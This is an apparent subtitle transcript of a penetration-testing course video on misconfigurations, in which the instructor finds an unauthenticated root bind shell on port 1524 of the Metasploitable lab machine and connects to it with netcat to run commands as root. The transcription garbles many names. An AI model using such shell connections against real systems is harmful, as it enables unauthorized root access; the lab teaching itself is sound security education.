1
00:00:00,300 --> 00:00:01,470
-: Welcome back,

2
00:00:01,470 --> 00:00:03,330
In this video we are going to cover

3
00:00:03,330 --> 00:00:05,678
and talk about misconfigurations.

4
00:00:05,678 --> 00:00:08,652
And also in this very video we will cover the

5
00:00:08,652 --> 00:00:13,020
easiest possible vulnerability that you could ever find.

6
00:00:13,020 --> 00:00:14,970
You might have already noticed it

7
00:00:14,970 --> 00:00:17,771
while always can as portable, and if you didn't.

8
00:00:17,771 --> 00:00:21,600
I will give you a chance to find it right now.

9
00:00:21,600 --> 00:00:25,170
So what I did right here is, I performed a version scan

10
00:00:25,170 --> 00:00:27,480
on the Meta Displayable virtual machine.

11
00:00:27,480 --> 00:00:29,790
You can do the same, or you can just take

12
00:00:29,790 --> 00:00:32,159
a look at the results right here.

13
00:00:32,159 --> 00:00:35,190
And do you by any chance see something that

14
00:00:35,190 --> 00:00:37,980
sticks out right here, something that shouldn't

15
00:00:37,980 --> 00:00:41,340
be here? Now you should be able to figure it out

16
00:00:41,340 --> 00:00:43,650
based on what we learned for now.

17
00:00:43,650 --> 00:00:45,783
So I will just give you a few seconds.

18
00:00:50,190 --> 00:00:51,990
And time has come.

19
00:00:51,990 --> 00:00:54,030
Have you managed to find it?

20
00:00:54,030 --> 00:00:57,431
It is this bind shell right here.

21
00:00:57,431 --> 00:01:02,431
And under diversion it says meta exploitable, root shell.

22
00:01:02,970 --> 00:01:04,470
I mean just by its name.

23
00:01:04,470 --> 00:01:07,500
We can see that something doesn't seem right.

24
00:01:07,500 --> 00:01:09,720
We know what bind shell is, right?

25
00:01:09,720 --> 00:01:12,965
So if this service doesn't have any type of authentication

26
00:01:12,965 --> 00:01:15,060
we can just try to connect

27
00:01:15,060 --> 00:01:19,230
to this port that hosts this bind shell in case

28
00:01:19,230 --> 00:01:24,230
port 1524 over TCP, and we will be given our route shell

29
00:01:24,249 --> 00:01:26,103
on that machine.

30
00:01:27,270 --> 00:01:30,000
Can't be that easy, right?

31
00:01:30,000 --> 00:01:34,020
Well it is, and I wouldn't even consider this an expert.

32
00:01:34,020 --> 00:01:35,700
This is just an example

33
00:01:35,700 --> 00:01:38,550
of what a misconfiguration could look like.

34
00:01:38,550 --> 00:01:41,369
Now this would be a critical misconfiguration

35
00:01:41,369 --> 00:01:43,711
that would almost never happen,

36
00:01:43,711 --> 00:01:47,040
but sometimes even stuff like this can happen.

37
00:01:47,040 --> 00:01:49,110
Maybe an administrator set up something

38
00:01:49,110 --> 00:01:50,638
like this so he can access that machine

39
00:01:50,638 --> 00:01:53,040
from his home or from somewhere else

40
00:01:53,040 --> 00:01:56,550
but he forgot to put authentication on it.

41
00:01:56,550 --> 00:01:58,050
You never know.

42
00:01:58,050 --> 00:02:01,419
Okay, so how can we establish connection to this port?

43
00:02:01,419 --> 00:02:04,209
Well, we won't be using Mattis Plate framework

44
00:02:04,209 --> 00:02:06,670
for this particular thing.

45
00:02:06,670 --> 00:02:11,000
Instead we are going to use a tool called Netcat.

46
00:02:11,000 --> 00:02:14,850
And Netcat is a program that allows us to establish network

47
00:02:14,850 --> 00:02:18,630
connections with other machines using both DCP

48
00:02:18,630 --> 00:02:21,458
and UDP to run the net cat help menu, we can type

49
00:02:21,458 --> 00:02:26,458
NC - H, which stands for help.

50
00:02:26,671 --> 00:02:30,776
And here we can see menu is isn't that big at all.

51
00:02:30,776 --> 00:02:33,779
It only has a few options right here, and at

52
00:02:33,779 --> 00:02:36,510
the beginning of the menu we also got

53
00:02:36,510 --> 00:02:38,097
these two main options.

54
00:02:38,097 --> 00:02:43,097
We can either connect to somewhere, or we can listen

55
00:02:43,153 --> 00:02:46,860
for the inbound or incoming connections.

56
00:02:46,860 --> 00:02:50,182
Since our Met split able target machine has a bind shell

57
00:02:50,182 --> 00:02:55,080
that means we must connect to somewhere and the syntax

58
00:02:55,080 --> 00:02:57,780
is just nc, then the host name, or

59
00:02:57,780 --> 00:03:00,033
the IP address, and then the port.

60
00:03:01,155 --> 00:03:02,940
Let's try it out.

61
00:03:02,940 --> 00:03:05,332
If I go down here and type nc

62
00:03:05,332 --> 00:03:07,565
and then the IP address on my meta disposable,

63
00:03:07,565 --> 00:03:08,681
I go and check

64
00:03:08,681 --> 00:03:12,303
out over which port is the bind shell being hosted.

65
00:03:13,618 --> 00:03:17,070
It is over port 1524 and I will type space

66
00:03:17,070 --> 00:03:20,730
and then the port, or let me just clear the screen first

67
00:03:20,730 --> 00:03:22,950
and type and nc 192 at 168

68
00:03:22,950 --> 00:03:27,950
at 1.5 and then space 1524, press enter and it worked.

69
00:03:32,100 --> 00:03:34,050
We are again our route account

70
00:03:34,050 --> 00:03:36,321
on the method exploitable machine.

71
00:03:36,321 --> 00:03:40,421
And as in the previous video, we can do anything we want.

72
00:03:40,421 --> 00:03:43,881
See if I type who am I, we can see we are the root account.

73
00:03:43,881 --> 00:03:47,880
LS tells us what directories we have.

74
00:03:47,880 --> 00:03:50,372
And remember the test directory from the previous video.

75
00:03:50,372 --> 00:03:51,511
Here it is.

76
00:03:51,511 --> 00:03:54,870
I config will give us the IP address

77
00:03:54,870 --> 00:03:56,692
of the method exploitable machine.

78
00:03:56,692 --> 00:04:00,053
So everything works as in the previous video

79
00:04:00,053 --> 00:04:02,250
We are root count

80
00:04:02,250 --> 00:04:05,472
and we can execute the commands on the target system.

81
00:04:05,472 --> 00:04:09,161
Now don't get used to this type of exploitation.

82
00:04:09,161 --> 00:04:13,200
Matter of fact, I won't even consider this an exploitation

83
00:04:13,200 --> 00:04:15,810
because the vulnerability wasn't in software.

84
00:04:15,810 --> 00:04:18,570
But in a person who would set something like this up

85
00:04:18,570 --> 00:04:21,209
without ever authenticating.

86
00:04:21,209 --> 00:04:23,370
stuff like this, rarely happens.

87
00:04:23,370 --> 00:04:25,620
But I wanted to show you this just to see

88
00:04:25,620 --> 00:04:28,042
whether you will notice it in our scan.

89
00:04:28,042 --> 00:04:30,450
In the next video we're going to check

90
00:04:30,450 --> 00:04:33,060
out another quick vulnerability that is based

91
00:04:33,060 --> 00:04:35,070
on information disclosure.

92
00:04:35,070 --> 00:04:37,050
After that, we're getting slowly

93
00:04:37,050 --> 00:04:39,840
into harder and harder exploits.

94
00:04:39,840 --> 00:04:41,140
See you in the next video.